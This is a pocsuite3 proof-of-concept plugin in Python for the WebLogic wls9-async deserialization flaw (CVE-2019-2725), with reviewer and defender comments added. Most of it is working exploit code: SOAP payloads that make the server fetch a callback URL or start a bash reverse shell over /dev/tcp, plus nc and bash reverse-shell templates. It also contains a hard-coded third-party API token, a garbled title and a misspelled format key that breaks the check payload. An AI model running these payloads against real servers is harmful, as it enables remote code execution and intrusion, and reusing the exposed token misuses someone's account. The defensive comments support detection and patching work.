WebLogic CVE-2019-2725 的 pocsuite3 PoC

import re
from collections import OrderedDict
from urllib.parse import urljoin

from pocsuite3.api import Output,POCBase,register_poc,requests,logger,POC_CATEGORY,OptDict
from pocsuite3.api import get_listener_ip,get_listener_port
from pocsuite3.lib.utils import random_str

class DemoPOC(POCBase):
	"""pocsuite3 plugin for the WebLogic wls9-async deserialization issue (CVE-2019-2725).

	Every request built here is a POST to /async/AsyncResponseService with
	Content-Type text/xml, no credentials, and a SOAP <work:WorkContext> header
	that carries a Java bean description (java.beans.XMLDecoder, java.net.URL or
	java.lang.ProcessBuilder). That combination is the signature to look for in
	access logs, WAF rules and IDS content matches.

	Remediation is Oracle's security alert patch for CVE-2019-2725. Until it is
	applied, restricting access to the async web-service paths, or removing the
	component where it is unused, limits exposure.
	"""
	# Seebug metadata consumed by the framework.
	vulID = '97920'
	version = '1'
	author = ['seebug']
	vulDate = '2019-04-17'
	createDate = '2019-06-28'
	updateDate = '2019-06-28'
	references = ['https://www.seebug.org/vuldb/ssvid--97920']
	# NOTE(review): the non-ASCII part of this string is mis-encoded on the page,
	# and "10.12.1.3" does not agree with appVersion below ('10.3.6 12.1.3').
	# Confirm the title against the Seebug entry in `references`.
	name = "Welogic 10.3.6 10.12.1.3 wls9-async 鍙嶅簭鍒楀寲婕忔礊錛圕VE-2019-2725錛�"
	appPowerLink = ''	
	appName = 'Weblogic'
	appVersion = '10.3.6 12.1.3'
	vulType = 'unserialization'
	# Placeholder text only; it does not describe the vulnerability.
	desc = '''
		weblogic 123456789
	'''
	samples = []
	install_requires = ['']
	category = POC_CATEGORY.EXPLOITS.REMOTE
	
	def _options(self):
		"""Declare the plugin's `command` option.

		Returns an OrderedDict with one OptDict whose choices are two command
		templates keyed "nc" and "bash", with "bash" selected by default.

		NOTE(review): nothing else in this listing reads the option; _shell
		builds its own command string.
		"""
		o = OrderedDict()
		payload = {
			"nc" : "rm -f /tmp/p;mknod /tmp/p p && nc {0} {1} 0/tmp/p",
			"bash" : "bash -i >& /dev/tcp/{0}/{1} 0>& 1",
		}
		o['command'] = OptDict(selected = "bash",default=payload)
		return o

	def get_check_payload(self,lhost,lport,random_uri):
		"""Format the SOAP document used for the out-of-band check.

		The template asks the server-side decoder to build a java.net.URL for
		http://lhost:lport/<uri> and call openStream() on it: a single outbound
		HTTP fetch, no command execution.

		Defender note: the check depends on the server being able to reach the
		callback host. Where egress from the application tier is filtered, a
		negative result from _verify does not show that the host is patched.
		"""
		check_payload = '''
			<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">   
			<soapenv:Header> 
			<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
			<java version="1.8" class="java.beans.XMLDecoder">
                    <object id="url" class="java.net.URL">
                      <string>http://{lhost}:{lport}/{random_uri}</string>
                    </object>
                    <object idref="url">
                      <void id="stream" method = "openStream" />
                    </object>
                  </java>
			</work:WorkContext>
			</soapenv:Header>
			<soapenv:Body>
			<asy:onAsyncDelivery/>
			</soapenv:Body></soapenv:Envelope>
		'''
		return check_payload.format(lhost = lhost,lport = lport ,ramdom_uri = random_uri)


	def _verify(self):
		"""Run the out-of-band check and report through parse_output().

		Posts the check document to the target, then reads the callback
		service's request log and looks for the per-run random URI. `result`
		is filled only when the URI is found; otherwise it stays empty and
		parse_output() reports failure.
		"""
		result = {}

		veri_url = urljoin(self.url, '/async/AsyncResponseService')
		# Per-run marker, so that only a callback caused by this request matches.
		random_uri = random_str(16)
		# NOTE(review): the callback host is a hard-coded third-party service,
		# so every check discloses the tested server's egress address to it.
		check_host = "zum76x.ceye.io"
		check_port = 80
		payload = self.get_check_payload(check_host, check_port , random_uri)
		headers = {
			"User-Agent" : "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
			"Content-Type" : "text/xml"
		}

		try:
			requests.post(veri_url, data=payload, headers=headers)
			# NOTE(review): the API token is hard-coded and sent in the query
			# string over plain http. Anyone who reads this page can query that
			# account's callback log. Load the token from configuration and
			# rotate the published value.
			resp = requests.get('http://api.ceye.io/v1/records?token=7404ec52d62f743915a2a3adc07a2077&type=request')
			# check_host is interpolated into the regex unescaped, so its dots
			# match any character; the 16-character marker carries the match.
			pattern = "http://{0}(:{1})?/{2}".format(check_host, check_port, random_uri)
			if re.search(pattern , resp.text):
				result['VerifyInfo'] = {}
				result['VerifyInfo']['URL'] = veri_url
				result['VerifyInfo']['Payload'] = payload
		except	Exception as e:
				# Any error (DNS, timeout, callback API down) is only logged,
				# so the run ends as 'target is not vulnerable'. Do not treat
				# that output as evidence that a host is patched.
				logger.warn(str(e))
		return self.parse_output(result)

	def _attack(self):
		"""Attack mode performs the same check as _verify()."""
		return self._verify()

	def get_shell_payload(self, cmd_base,cmd_opt, cmd_payload):
		"""Format the SOAP document that _shell posts.

		The WorkContext header describes a java.lang.ProcessBuilder built from
		a three-element String array (cmd_base, cmd_opt, cmd_payload), followed
		by a call to start(). format() inserts the three values verbatim.

		Defender note: `java.lang.ProcessBuilder` inside a WorkContext header
		has no legitimate use on this endpoint and is a high-confidence
		content match for request inspection.
		"""
		shell_payload= '''
			soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">   
			<soapenv:Header> 
			<wsa:Action>xx</wsa:Action>
			<wsa:RelatesTo>xx</wsa:RelatesTo>
			<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
			<void class="java.lang.ProcessBuilder">
			<array class="java.lang.String" length="3">
			<void index="0">
			<string>{cmd_base}</string>
			</void>
			<void index="1">
			<string>{cmd_opt}</string>
			</void>
			<void index="2">
			<string>{cmd_payload}</string>
			</void>
			</array>
			<void method="start"/></void>
			</work:WorkContext>
			</soapenv:Header>
			<soapenv:Body>
			<asy:onAsyncDelivery/>
			</soapenv:Body></soapenv:Envelope>	
		'''
		return shell_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=cmd_payload)

	def _shell(self):
		"""Post the ProcessBuilder document with the framework listener's address.

		Returns None; request errors are logged and otherwise ignored.

		Defender note: on the host, the corresponding signals are the WebLogic
		Java process spawning `/bin/bash -c ...` and the server opening an
		outbound TCP connection to an address it does not normally talk to.
		"""
		vul_url = urljoin(self.url, '/async/AsyncResponseService')
		# The command text is written with XML entities because it is placed
		# inside a <string> element of the SOAP document.
		cmd = 'bash -i &gt;&amp; /dev/tcp/{0}/{1} 0&gt;&amp;1'.format(get_listener_ip(), get_listener_port())
		shell_payload = self.get_shell_payload('/bin/bash', '-c' ,cmd)
		headers = {
			"User-Agent" : "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
			"Content-Type" : "text/xml"
		}
		
		try:
			requests.post(vul_url, data=shell_payload, headers=headers)
		except Exception as e:
			logger.warn(str(e))

	def parse_output(self, result):
		"""Wrap `result` in a pocsuite3 Output.

		A non-empty dict is reported as success; an empty one as failure with
		the message 'target is not vulnerable'. Because _verify leaves `result`
		empty on any exception, that message also covers runs where the check
		could not be completed.
		"""
		output = Output(self)
		if result:
			output.success(result)
		else:
			output.fail('target is not vulnerable')
		return output

# Hand the class to pocsuite3 so the framework can load and run this plugin.
register_poc(DemoPOC)

 
